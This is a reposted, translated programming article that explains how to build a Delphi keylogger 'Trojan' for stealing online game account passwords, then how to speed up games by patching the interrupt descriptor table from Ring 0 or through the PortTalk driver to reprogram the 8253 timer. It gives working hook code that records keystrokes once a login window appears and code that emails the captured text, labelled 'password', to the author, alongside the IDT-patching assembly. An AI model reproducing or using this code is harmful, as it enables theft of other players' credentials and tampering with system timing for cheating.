[Repost] One way to implement a "shifting gear" speed hack (creating and calling an interrupt gate)

xiaoxiao, 2021-03-05

The previous article covered action plug-ins, which modify the game locally and are plug-ins in the true sense. Today's subject is a different kind of "plug-in" that behaves like a Trojan: its purpose is to help the person who runs it steal other players' account names and passwords. Because such programs exist on the network I feel I have to talk about them (I personally detest this kind of plug-in; please treat this purely as a look at the technique, and thank you for your cooperation). There are several ways to implement such a program (message hooks, keyboard monitoring and so on). A conventional global hook demands more of the programmer and in practice needs an extra dynamic link library, so here I use keyboard monitoring to implement this type of Trojan: it needs only a single .exe to monitor the keyboard in the background, which suits this kind of program far better. Before writing any code we must be clear about the idea of the program:

1. First find out the title of the login window you want to watch.
2. Determine whether the login window has appeared.
3. If the login window has appeared, record the keyboard.
4. When the window is closed, send the recorded information to the programmer's mailbox.

I will not analyse the first point in detail, because you have to know which game you play and what the title of its login window is. Starting from the second point, let us build this type of plug-in. How do we determine whether the login window has appeared? It is actually very simple; the FindWindow function does it for us:

    HWND FindWindow(
        LPCTSTR lpClassName,   // pointer to class name
        LPCTSTR lpWindowName   // pointer to window name
    );

In the actual program we want to find the window titled 'XX', so we call FindWindow(nil, 'XX'); FindWindow returns 0 when no matching window exists, so if the return value is greater than 0 the window has appeared and we can start recording keyboard input. For that we install a hook with SetWindowsHookEx; its usage is as follows:

    HHOOK SetWindowsHookEx(
        int idHook,        // type of hook to install
        HOOKPROC lpfn,     // address of hook procedure
        HINSTANCE hMod,    // handle of application instance
        DWORD dwThreadId   // identity of thread to install hook for
    );

We have to write the hook procedure ourselves, and for hMod we can simply use this program's own HInstance. The concrete call is:

    hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);

WH_JOURNALRECORD is the reason a single .exe is enough: it is a system-wide hook, but unlike WH_KEYBOARD its procedure does not have to live in a DLL, because it is called in the context of the thread that installed it. (On Windows Vista and later, journal hooks are subject to User Interface Privilege Isolation and are effectively unavailable to an ordinary application, so what follows applies to Windows 9x/2000/XP.) The hook procedure is a little more complex:

    function HookProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall;
    begin
      if findedtitle then                                  // the login window has been found
      begin
        if PEventMsg(lParam)^.message = WM_KEYDOWN then    // the message is a key press
        begin
          // KeyHookResult is a custom function whose main job is to convert the
          // intercepted message parameters (the virtual-key code in paramL and the
          // scan code in paramH) into the name of the key. It was to be given at the
          // end of the document, which is not included on this page.
          hookkey := hookkey + Form1.KeyHookResult(PEventMsg(lParam)^.paramL,
                                                   PEventMsg(lParam)^.paramH);
          if Length(hookkey) > 0 then                      // we obtained a key name
          begin
            Write(hookkeyfile, hookkey);                   // write the key name to the text file
            hookkey := '';
          end;
        end;
      end;
      // pass the event on to the next hook in the chain (the original omits this line)
      Result := CallNextHookEx(hHook, iCode, wParam, lParam);
    end;

That is the whole process of recording the keyboard; simple enough. Do not forget to remove the hook when you are finished with UnhookWindowsHookEx(hHook), where hHook is the handle returned by SetWindowsHookEx. Now that we have the keyboard record, all that remains is to send it back, and we are done. Sending is not difficult either: just read the record from the text file and hand it to the TNMSMTP mail component that comes with Delphi.

The code is as follows:

    AssignFile(readfile, 'hook.txt');     // open the text file hook.txt
    Reset(readfile);                      // open it for reading
    try
      while not Eof(readfile) do          // until the end of the file is reached
      begin
        Readln(readfile, s);              // read one line of the file
        body := body + s;
      end;
    finally
      CloseFile(readfile);                // close the file
    end;
    NMSMTP1.EncodeType := uuMime;                             // set the encoding
    NMSMTP1.PostMessage.Attachments.Text := '';               // set attachments (none)
    NMSMTP1.PostMessage.FromAddress := 'xxx@xxx.com';         // set the source mail address
    NMSMTP1.PostMessage.ToAddress.Text := 'xxx@xxx.com';      // set the target mail address
    NMSMTP1.PostMessage.Body.Text := 'password' + ' ' + body; // set the mail content
    NMSMTP1.PostMessage.Subject := 'password';                // set the mail title
    NMSMTP1.Connect;                      // connect to the SMTP server configured in NMSMTP1.Host
    NMSMTP1.SendMail;                     // send the email
    NMSMTP1.Disconnect;
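The page never shows KeyHookResult, the piece that turns a journal-hook record into text. The following C program is an added example (not code from the original article) that models the recording core of the hook above on a constructed record stream: it takes EVENTMSG-shaped records, the structure a WH_JOURNALRECORD hook receives through lParam (message, paramL with the virtual-key code in its low byte, paramH with the scan code, time, hwnd), keeps only WM_KEYDOWN events while the login window is present, and tracks the Shift state so letters and top-row symbols come out as typed. The key-to-character mapping assumes a US layout and is my own stand-in, not the author's function; the record stream and scan codes are constructed for illustration.

```c
/* Added example: replaying WH_JOURNALRECORD-style records into typed text.
 * Not code from the original article. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define WM_KEYDOWN 0x0100
#define WM_KEYUP   0x0101
#define VK_BACK    0x08
#define VK_RETURN  0x0D
#define VK_SHIFT   0x10
#define VK_SPACE   0x20

/* Same field order as the Win32 EVENTMSG structure. */
typedef struct {
    uint32_t  message;
    uint32_t  paramL;   /* low byte: virtual-key code */
    uint32_t  paramH;   /* low byte: scan code */
    uint32_t  time;
    uintptr_t hwnd;
} EventMsg;

/* ASCII for a virtual-key code, honouring Shift; 0 if the key prints nothing.
 * US keyboard layout assumed. */
static char vk_to_char(unsigned vk, int shift) {
    static const char digits[]  = "0123456789";
    static const char shifted[] = ")!@#$%^&*(";
    if (vk >= '0' && vk <= '9') return shift ? shifted[vk - '0'] : digits[vk - '0'];
    if (vk >= 'A' && vk <= 'Z') return shift ? (char)vk : (char)(vk + ('a' - 'A'));
    if (vk == VK_SPACE) return ' ';
    return 0;
}

/* Replays n records into out. login_visible plays the role of the hook's
 * 'findedtitle' gate: nothing is recorded unless the target window is present.
 * Backspace removes the last character; Enter ends the capture.
 * Returns the number of characters written (excluding the NUL). */
size_t replay_keystrokes(const EventMsg *ev, size_t n, int login_visible,
                         char *out, size_t outsz) {
    size_t len = 0;
    int shift = 0;
    if (outsz == 0) return 0;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        unsigned vk = ev[i].paramL & 0xFF;
        if (vk == VK_SHIFT) {                       /* modifier: track both edges */
            shift = (ev[i].message == WM_KEYDOWN);
            continue;
        }
        if (!login_visible || ev[i].message != WM_KEYDOWN) continue;
        if (vk == VK_RETURN) break;
        if (vk == VK_BACK) { if (len) out[--len] = '\0'; continue; }
        char c = vk_to_char(vk, shift);
        if (c && len + 1 < outsz) { out[len++] = c; out[len] = '\0'; }
    }
    return len;
}

/* Constructed sample: the user types "Pa4", corrects the 4 to a 5, adds "s!",
 * presses Enter, then keeps typing. Scan codes are illustrative only. */
static const EventMsg sample[] = {
    { WM_KEYDOWN, VK_SHIFT,  0x2A,  1, 0 }, { WM_KEYDOWN, 'P',      0x19,  2, 0 },
    { WM_KEYUP,   'P',       0x19,  3, 0 }, { WM_KEYUP,   VK_SHIFT, 0x2A,  4, 0 },
    { WM_KEYDOWN, 'A',       0x1E,  5, 0 }, { WM_KEYUP,   'A',      0x1E,  6, 0 },
    { WM_KEYDOWN, '4',       0x05,  7, 0 }, { WM_KEYUP,   '4',      0x05,  8, 0 },
    { WM_KEYDOWN, VK_BACK,   0x0E,  9, 0 }, { WM_KEYUP,   VK_BACK,  0x0E, 10, 0 },
    { WM_KEYDOWN, '5',       0x06, 11, 0 }, { WM_KEYUP,   '5',      0x06, 12, 0 },
    { WM_KEYDOWN, 'S',       0x1F, 13, 0 }, { WM_KEYUP,   'S',      0x1F, 14, 0 },
    { WM_KEYDOWN, VK_SHIFT,  0x2A, 15, 0 }, { WM_KEYDOWN, '1',      0x02, 16, 0 },
    { WM_KEYUP,   '1',       0x02, 17, 0 }, { WM_KEYUP,   VK_SHIFT, 0x2A, 18, 0 },
    { WM_KEYDOWN, VK_RETURN, 0x1C, 19, 0 },
    { WM_KEYDOWN, 'X',       0x2D, 20, 0 },  /* after Enter: must not be recorded */
};
#define SAMPLE_COUNT (sizeof sample / sizeof sample[0])

/* 1 if replaying the sample with the given window state yields expected. */
int sample_records_to(int login_visible, const char *expected) {
    char buf[64];
    replay_keystrokes(sample, SAMPLE_COUNT, login_visible, buf, sizeof buf);
    return strcmp(buf, expected) == 0;
}

int main(void) {
    char buf[64];
    replay_keystrokes(sample, SAMPLE_COUNT, 1, buf, sizeof buf);
    printf("recorded while login window visible: \"%s\"\n", buf);
    return 0;
}
```

The point the hook itself glosses over is state: the raw stream carries key-up events and modifiers that must be consumed rather than appended, which is why a converter that only looks at one WM_KEYDOWN at a time gets Shift wrong.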

2003-5-15 10:38:09

I had not figured out how to write an acceleration plug-in until the second half of 2001, when I read the "Transmission gear" study articles (the original and the reassembled version). Only then did I understand it; after trying it out in Delphi I will share my experience with everyone, and I thank Yan Rui, the author of the "Transmission gear" study, for the hint. No more nonsense, let the magical accelerated plug-in experience begin! I originally thought that an acceleration plug-in had to be written for one particular game; later I found that idea was wrong. A so-called acceleration plug-in actually achieves its acceleration by modifying the clock frequency. In the old DOS era anyone who did programming would immediately say this is very simple: is it not just a matter of reprogramming the 8253 timer registers? That may have worked in the DOS era, but not under Windows.

Windows is a 32-bit operating system: do you think you can just change it? (Microsoft's stuff is that domineering: if it says you cannot change something, you cannot.) But it is not impossible. We can do it in two ways. The first is to write a hardware driver; the second is to do it from Ring 0 (the method first used by Chen Yinghao, the author of CIH: modify the IDT, create an interrupt gate, enter Ring 0 through it, call the interrupt, then restore the vector. There is no way around using assembly for this, sorry, fellow high-level language users!). The first method is troublesome, so here we use the second. Let us think about the idea before implementing it:

1. Write a procedure with embedded assembly that reads the IDT, creates the interrupt gate, modifies the vector and so on.
2. Call this procedure to achieve the acceleration.

Now let us look at the code while explaining. First we build the procedure that is the core of the program:

    procedure SetRing(Value: Word); stdcall;
    const
      zdh = $03;                     // the interrupt number whose gate we borrow
    var
      IDT: array[0..5] of Byte;      // 6-byte IDTR image: 16-bit limit, 32-bit base
      OG: DWORD;                     // the old handler offset
    begin
      asm
        push ebx
        sidt IDT                     // read the interrupt descriptor table register
        mov ebx, dword ptr [IDT+2]   // IDT base address
        add ebx, 8*zdh               // address of the 8-byte gate descriptor for interrupt zdh
        cli                          // disable interrupts
        mov dx, word ptr [ebx+6]     // old offset, high 16 bits (bytes 6-7)
        shl edx, 16
        mov dx, word ptr [ebx]       // old offset, low 16 bits (bytes 0-1)
        mov [OG], edx                // save the old vector
        mov eax, offset @@Ring0      // point the gate at our Ring 0 code
        mov word ptr [ebx], ax       // low 16 bits of the offset go into bytes 0-1
        shr eax, 16
        mov word ptr [ebx+6], ax     // high 16 bits of the offset go into bytes 6-7
        int zdh                      // raise the interrupt: the CPU enters @@Ring0 in Ring 0
        mov ebx, dword ptr [IDT+2]   // locate the descriptor again
        add ebx, 8*zdh
        mov edx, [OG]
        mov word ptr [ebx], dx
        shr edx, 16
        mov word ptr [ebx+6], dx     // restore the original vector
        sti                          // re-enable interrupts (added here; the original omits it)
        pop ebx
        jmp @@ExitAsm
      @@Ring0:                       // this is the core: it runs in Ring 0
        mov al, $34                  // 8253 control word: counter 0, low byte then high byte, mode 2
        out $43, al
        mov ax, Value                // the timer reload value
        out $40, al                  // write the low byte
        mov al, ah
        out $40, al                  // write the high byte
        iretd                        // return to Ring 3
      @@ExitAsm:
      end;
    end;

Two details decide whether this works. First, the code writes the IDT from Ring 3; that succeeds on Windows 9x, which leaves the IDT in memory an ordinary process can write, and fails with an access violation on Windows NT/2000, where the IDT pages are kernel-only. Second, only the two offset halves (bytes 0-1 and 6-7) are overwritten; the selector, type and DPL in bytes 2-5 are left alone, so the gate keeps its Ring 0 code selector and the DPL of 3 that allows INT 3 from user mode. Borrowing a gate whose DPL is below 3 would raise a general protection fault instead of entering Ring 0. Note also that counter 0 of the 8253 drives the system timer interrupt, so the whole machine's tick rate changes, not just the game's.

That is the core. Most readers will already see how it works; if not, huh, try it anyway. Let us use this procedure to make something like the "shifting gear". Put a TrackBar control on a form, set its Max to 20, its Min to 1 and its Position to 10, and in its OnChange event write:

    SetRing(StrToInt('$' + IntToStr(1742 + (10 - TrackBar1.Position) * 160)));

Because the default Windows value is $1742 we use 1742 as the base (IntToStr produces decimal digits that are then read back as a hexadecimal number, so position 10 gives exactly $1742). The smaller the reload value the faster the timer ticks, and the larger the slower, hence this formula. That is the Delphi + ASM version of "shifting gear" (Win9x only); try it, it will help you, huh.

In Win2000 we cannot do this directly: Ring 0 is lost to us. Some will think we could write a driver instead, but Windows 2000 drivers are not VxDs, and a low hand like me cannot write the WDM drivers Windows uses, so there is no way on that front. I only have one good implementation: PortTalk is a nice device driver that makes low-level port operations very convenient, and with it we can implement the acceleration plug-in.

1. First download the PortTalk driver; its official website is http://www.beyondlogic.org
2. Copy the porttalk.sys it contains.
3. Build a Delphi interface to porttalk.sys (I omit this; everyone can download the .pas file from http://www.freewebs.com/liuyue/porttalk.pas).
4. Implement the acceleration plug-in.

I originally did not want to say too much, but let us talk about the implementation. Operating the port through PortTalk is much easier than the Ring 0 trick on Win98. Bear in mind that PortTalk works by loading a kernel driver, so the program needs administrator rights on the machine, whereas the Win9x version needs none.

1. Create a new project and copy the interface unit and porttalk.sys to the folder where the project is saved.
2. Add to the uses clause of the new project: uses Windows, PortTalk, ...
3. Create a procedure (the translation garbled its name; it is the same SetRing as above):

    procedure SetRing(Value: Word);
    begin
      if not OpenPortTalk then Exit;  // open the PortTalk driver; give up if that fails
      OutPortB($43, $34);             // 8253 control word: counter 0, low byte then high byte, mode 2
      OutPortB($40, Lo(Value));       // write the low byte of the reload value
      OutPortB($40, Hi(Value));       // write the high byte
      ClosePortTalk;
    end;

4. Add a form with a TrackBar, set its Max to 20, its Min to 1 and its Position to 10, and in its OnChange event write:

    SetRing(StrToInt('$' + IntToStr(1742 + (10 - TrackBar1.Position) * 160)));
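Both versions above rest on two facts the prose only names: the byte layout of an i386 gate descriptor, which is what the SetRing assembly manipulates with its [ebx], [ebx+6] offsets, and the relation between the 8253 reload value and the resulting tick rate, which is what the TrackBar formula drives. The following C program is an added example (not code from the original article) that models both in user space: decode_gate() and patch_gate_offset() reproduce the assembly's descriptor surgery on a constructed gate so you can check that the selector, type and DPL survive; reload_for_position() evaluates the TrackBar formula, including its decimal-digits-read-as-hex quirk; pit_frequency() converts a reload value to hertz using the 8253's 1.193182 MHz input clock. The sample gate bytes (offset 0x8003F6A0, selector 0x0028) are constructed, not taken from any real kernel.

```c
/* Added example: i386 gate descriptor surgery and 8253 reload arithmetic,
 * modelled in user space. Not code from the original article. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define PIT_INPUT_HZ 1193182u   /* 8253/8254 input clock */

typedef struct {
    uint32_t offset;    /* handler address: bytes 0-1 (low) and 6-7 (high) */
    uint16_t selector;  /* code segment selector: bytes 2-3 */
    uint8_t  type;      /* 0xE = 32-bit interrupt gate, 0xF = 32-bit trap gate */
    uint8_t  dpl;       /* highest ring allowed to INT through the gate */
    uint8_t  present;
} Gate;

static uint32_t gate_offset(const uint8_t g[8]) {
    return (uint32_t)g[0] | (uint32_t)g[1] << 8 | (uint32_t)g[6] << 16 | (uint32_t)g[7] << 24;
}

Gate decode_gate(const uint8_t g[8]) {
    Gate d;
    d.offset   = gate_offset(g);
    d.selector = (uint16_t)(g[2] | g[3] << 8);
    d.type     = g[5] & 0x0F;           /* access byte: P | DPL(2) | 0 | type(4) */
    d.dpl      = (g[5] >> 5) & 3;
    d.present  = g[5] >> 7;
    return d;
}

/* Mirrors the asm: read the old offset, write the new low and high halves,
 * touch nothing else. Returns the old offset (what the asm keeps in OG). */
uint32_t patch_gate_offset(uint8_t g[8], uint32_t new_offset) {
    uint32_t old = gate_offset(g);
    g[0] = (uint8_t)new_offset;         g[1] = (uint8_t)(new_offset >> 8);
    g[6] = (uint8_t)(new_offset >> 16); g[7] = (uint8_t)(new_offset >> 24);
    return old;
}

/* INT n from ring 3 succeeds only if the gate is present and its DPL is 3. */
int int_allowed_from_ring3(const uint8_t g[8]) {
    Gate d = decode_gate(g);
    return d.present && d.dpl == 3;
}

/* Constructed Ring 0 trap gate such as the one INT 3 might use: offset
 * 0x8003F6A0, selector 0x0028, access byte 0xEF (present, DPL 3, trap gate). */
static const uint8_t sample_gate[8] = { 0xA0, 0xF6, 0x28, 0x00, 0x00, 0xEF, 0x03, 0x80 };

/* Runs the SetRing sequence on a copy of sample_gate: patch in handler, check
 * that the gate still points at the same selector with the same type and DPL and
 * is still usable from ring 3, then restore. Returns 1 if every invariant holds. */
int gate_roundtrip_ok(uint32_t handler) {
    uint8_t g[8]; memcpy(g, sample_gate, 8);
    Gate before = decode_gate(g);
    uint32_t old = patch_gate_offset(g, handler);
    Gate mid = decode_gate(g);
    int ok = old == before.offset && mid.offset == handler
          && mid.selector == before.selector && mid.type == before.type
          && mid.dpl == before.dpl && int_allowed_from_ring3(g);
    patch_gate_offset(g, old);
    return ok && memcmp(g, sample_gate, 8) == 0;
}

/* Same gate with a different access byte: shows why only a DPL-3 gate works. */
int int_allowed_with_access_byte(uint8_t access) {
    uint8_t g[8]; memcpy(g, sample_gate, 8); g[5] = access;
    return int_allowed_from_ring3(g);
}

/* The TrackBar formula: IntToStr(1742 + (10 - pos) * 160) read back as hex.
 * For pos in 1..20 the decimal result is positive and all its digits are 0-9,
 * so re-reading them as hexadecimal digits is always valid. */
uint16_t reload_for_position(int pos) {
    int dec = 1742 + (10 - pos) * 160;
    char buf[16];
    snprintf(buf, sizeof buf, "%d", dec);
    uint32_t hex = 0;
    for (const char *p = buf; *p; p++) hex = hex * 16 + (uint32_t)(*p - '0');
    return (uint16_t)hex;
}

/* Timer interrupt rate for a reload value (a reload of 0 means 65536). */
double pit_frequency(uint16_t reload) {
    return (double)PIT_INPUT_HZ / (reload ? reload : 65536u);
}

int main(void) {
    Gate g = decode_gate(sample_gate);
    printf("sample gate: offset=%08x selector=%04x type=%x dpl=%u\n",
           g.offset, g.selector, g.type, g.dpl);
    int positions[] = { 1, 10, 20 };
    for (int i = 0; i < 3; i++) {
        uint16_t r = reload_for_position(positions[i]);
        printf("position %2d: reload $%04X -> %.1f Hz\n", positions[i], r, pit_frequency(r));
    }
    return 0;
}
```

Running the position loop shows the asymmetry of the formula: position 10 gives $1742 (about 200 Hz), position 20 gives $142 (about 3.7 kHz, roughly 18 times faster), while position 1 gives $3182 (about 94 Hz), so the slider slows the clock much less than it speeds it up.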


Please credit the original address when reposting: https://www.9cbs.com/read-38759.html
